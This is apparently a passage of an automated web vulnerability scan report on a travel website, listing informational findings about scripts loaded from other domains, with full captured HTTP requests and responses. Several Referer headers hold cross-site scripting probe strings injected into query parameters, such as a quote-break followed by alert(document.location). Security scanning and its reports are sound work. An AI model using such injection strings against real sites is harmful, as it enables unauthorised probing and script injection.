Cookie: __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-3; mbox=session#1317601622475-177474#1317604892|PC#1317601622475-177474.19#1318812632|check#true#1317603092; __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmb=179047228.2.10.1317601644; __utmc=179047228; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:00:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="jPFyPOMFqOIyySa1Ijk47BJFS78c8e34J/QbTBG6D+LxhAxUsjypMF6hiFDTpoMbcfo9sE57OmQ9GgbZpzfvNckFyhKdrmHnA0uwRcf2yHhSGoL+1kOWQ6RHFhI=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=1&random=634531860109256513?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=798742402634531860109256513&adsize=728x90&pagepos=2&random=634531860109412760?" type="text/javascript"></script>
...[SNIP]...

20.68. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-2; mbox=session#1317601622475-177474#1317604709|PC#1317601622475-177474.19#1318812449|check#true#1317602909; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:52:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="B9TPERwQcR+D/nBPJDRqBKD1IcNELB0s1zPw+XALdvHgPFTe4T0RRGzh0YSgIuK78WpCRw48jXCy7RKSJLmMTPuuebMaFQABqNR5D8K4959K3DUL1p0gQOIzC9k=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=1&random=634531855518125000?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=328994155634531855518125000&adsize=728x90&pagepos=2&random=634531855518125000?" type="text/javascript"></script>
...[SNIP]...

20.69. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=detm5oiqzuobkv55byidi4y1; UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_UVId=2BC47C1462303C7A; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:29:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36813


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="7q9zFOyFqTPnc5W06UryrpkD0++Wka0AMjC1S1xA6P1yyTp8PCxurvnrk9jOzADXv65HGKV1PAMbdsNjVp0aWbrCQsVMDW+7SSf9eWpiDrdh5lUG1nQvUBpOJY8=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=1&random=634531841399843750?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1518210046634531841399843750&adsize=728x90&pagepos=2&random=634531841399843750?" type="text/javascript"></script>
...[SNIP]...

20.70. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196339417056915 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunderda8d5'%3balert(1)//6e4526513fd&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UUIDCookie=fd72388248504134a997b0470a493620; SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-1; mbox=check#true#1317601683|session#1317601622475-177474#1317603483|PC#1317601622475-177474.19#1318811230; __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; SL_UVId=2BC47C1462303C7A

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:49:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36813


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="3N4s99OteDpCXgpNG2PjNUab70AmGz5GNt8h7GVhdJlW5f7uORj9diLS188nzy3C95evwfUCPht+S0+LL/XseWCdGKfWD3MqIININNQGXpT1AOgH8SdbDoTSVkI=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=1&random=634531853686093750?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=1345850578634531853686093750&adsize=728x90&pagepos=2&random=634531853686093750?" type="text/javascript"></script>
...[SNIP]...

20.71. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317601642.1; __utmb=179047228.1.10.1317601644; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D125%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-2; mbox=session#1317601622475-177474#1317604709|PC#1317601622475-177474.19#1318812449|check#true#1317602909; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:02:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="NVxZLHrIqCswN0wRDdLbAP4q6i7JUBF/BSBKXwsRucQjl8JZXW8fooMbdWdfUcptWjfwNfh3+gW3yrXemG3k7WR8V+VhyM0fcttuCxI346cfwmMHvuUlHs6/8Fc=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=1&random=634531861569375000?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=724122354634531861569375000&adsize=728x90&pagepos=2&random=634531861569375000?" type="text/javascript"></script>
...[SNIP]...

20.72. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-4; mbox=session#1317601622475-177474#1317604984|PC#1317601622475-177474.19#1318812724|check#true#1317603184; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:52:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36801


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="5ZNp3byNbF4rEWpnV3Mgyig3ck+AM/H1JHJZ7rg546Nro6tmpBO79IXKcqIJ4C7B68/bNMrfxkMrNXTYUJtk3H/IsKviVwR5Iwpi2TYMU6oH4U3USehc0e6zulY=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=1&random=634531891317407305?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=68309251634531891317407305&adsize=728x90&pagepos=2&random=634531891317407305?" type="text/javascript"></script>
...[SNIP]...

20.73. http://www.igougo.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /WebResource.axd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebResource.axd?d=bcey9zNKaq8jmoZ3QSSEqg2&t=634196413115781250 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-3; mbox=session#1317601622475-177474#1317604892|PC#1317601622475-177474.19#1318812632|check#true#1317603092; __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmb=179047228.2.10.1317601644; __utmc=179047228; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:54:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: Compression
Content-Length: 36807


<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8"/>


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<title>Vacation and Hotel Reviews, Travel Photos and Pi
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="htUBgDWgvvvhpb2xHSKIzmWayFVjHUNiN+bbTswgTjdNej6MQx2CBFHihW9CB61llOgCDzIRoiGaakK7axh51mklWwWfScOWQx9a7tggZDZI6snXPCpFOlzwKII=" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=1&random=634531856683906250?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=Other&tile=566650180634531856683906250&adsize=728x90&pagepos=2&random=634531856683906250?" type="text/javascript"></script>
...[SNIP]...

20.74. http://www.igougo.com/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /about/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/ HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-5; mbox=PC#1317601622475-177474.19#1318816337|check#true#1317606797|session#1317606736569-208906#1317608597

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 01:52:51 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47F12FA5D4186;path=/;
X-SL-CompState: Uncompiled
X-Strangeloop: ViewState,Compression
Content-Length: 40510


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   

<meta http-equiv="X-UA-Compatible" content="IE=Emulate
...[SNIP]...
<![endif]-->


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/prototype/1.6.1.0/prototype.js' type='text/javascript'></script>
<script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects' type='text/javascript'></script><script language="javascript" src='http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/effects.js' type='text/javascript'></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="000006THQNWM5" />


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471?" type="text/javascript"></script>
...[SNIP]...
<div class="squareAd alignC">
           <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471?" type="text/javascript"></script>
...[SNIP]...
<!-- begin Travelocity Ad -->
               <script language="JavaScript" src="http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471?" type="text/javascript"></script>
...[SNIP]...

20.75. http://www.igougo.com/traveldeals/ratefinder.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:27:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
